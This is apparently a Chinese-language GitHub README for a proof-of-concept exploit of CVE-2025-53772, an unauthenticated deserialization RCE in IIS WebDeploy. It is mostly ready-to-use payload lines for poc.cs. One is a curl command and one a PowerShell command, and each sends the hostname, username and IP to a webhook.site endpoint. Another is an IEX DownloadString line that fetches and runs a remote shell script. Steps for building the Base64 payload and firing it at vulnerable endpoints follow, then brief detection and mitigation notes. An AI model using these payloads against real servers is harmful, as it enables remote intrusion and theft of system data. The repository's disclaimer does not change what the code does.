
CVE-2025-53772 的概念验证漏洞利用程序,该漏洞是 IIS WebDeploy 中通过不安全反序列化导致的远程代码执行漏洞。包含可自定义的载荷生成功能,支持信息收集、命令执行和反向连接 shell。
此仓库包含针对 CVE-2025-53772 的概念验证(PoC)漏洞利用程序,该漏洞是 IIS WebDeploy 中因不安全反序列化而导致的远程代码执行(RCE)漏洞。
此工具仅用于教育和经授权的安全测试目的。作者不对因使用本软件而造成的任何误用或损害负责。请仅在您拥有或已获得明确测试许可的系统上使用。
编辑 poc.cs 第 18-19 行中的 payload,以指定您的目标操作:
csharp// Replace with your webhook URL and desired payload
set.Add("cmd.exe");
set.Add("/c curl -X POST https://webhook.site/YOUR-WEBHOOK-ID -H \"Content-Type: application/json\" -d \"{\\\"hostname\\\":\\\"%COMPUTERNAME%\\\",\\\"user\\\":\\\"%USERNAME%\\\",\\\"ip\\\":\\\"$(curl -s ifconfig.me)\\\",\\\"exploit\\\":\\\"CVE-2025-53772\\\",\\\"timestamp\\\":\\\"%DATE% %TIME%\\\"}\"");
信息收集(推荐):
csharpset.Add("powershell.exe");
set.Add("-Command \"$hostname=$env:COMPUTERNAME; $user=$env:USERNAME; $ip=(Invoke-RestMethod -Uri 'https://ipinfo.io/ip' -UseBasicParsing); $body=@{hostname=$hostname;user=$user;ip=$ip;exploit='CVE-2025-53772';timestamp=(Get-Date)} | ConvertTo-Json; Invoke-RestMethod -Uri 'https://webhook.site/YOUR-WEBHOOK-ID' -Method Post -Body $body -ContentType 'application/json'\"");
简单命令执行:
csharpset.Add("cmd.exe");
set.Add("/c calc.exe"); // Opens calculator
反弹 Shell(高级):
csharpset.Add("powershell.exe");
set.Add("-Command \"IEX (New-Object Net.WebClient).DownloadString('http://YOUR-SERVER/shell.ps1')\"");
GitHub Action 将自动编译 PoC 并生成 Base64 编码的 payload:
推送您的更改以触发 GitHub Action 前往您仓库中的 Actions 选项卡 点击最近的一次工作流运行 在控制台输出中找到生成的 payload:
3. 部署漏洞利用程序
使用生成的 Base64 payload 攻击存在漏洞的 IIS WebDeploy 端点:
🎯 漏洞详情
受影响软件:IIS WebDeploy(多个版本) 漏洞类型:不安全反序列化导致 RCE 攻击向量:远程、无需认证 严重性:严重
如果您更倾向于本地编译而不是使用 GitHub Actions:
bash# Windows with .NET Framework C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe poc.cs poc.exe > payload.txt
csc poc.cs poc.exe 📡 设置 Webhook
前往 webhook.site 获取一个免费的 webhook URL 将 payload 中的 YOUR-WEBHOOK-ID 替换为您的唯一 ID 监控传入请求以查看漏洞利用执行结果
检测:
监控异常的 BinaryFormatter 反序列化活动 留意 IIS 工作进程创建的可疑子进程 通过网络监控发现意外的出站连接
缓解措施:
将 IIS WebDeploy 更新到最新的已修补版本 实施输入验证和清理 对反序列化类型使用白名单 部署网络分段与监控
CVE-2025-53772 详细信息 Microsoft 安全公告 NIST 漏洞数据库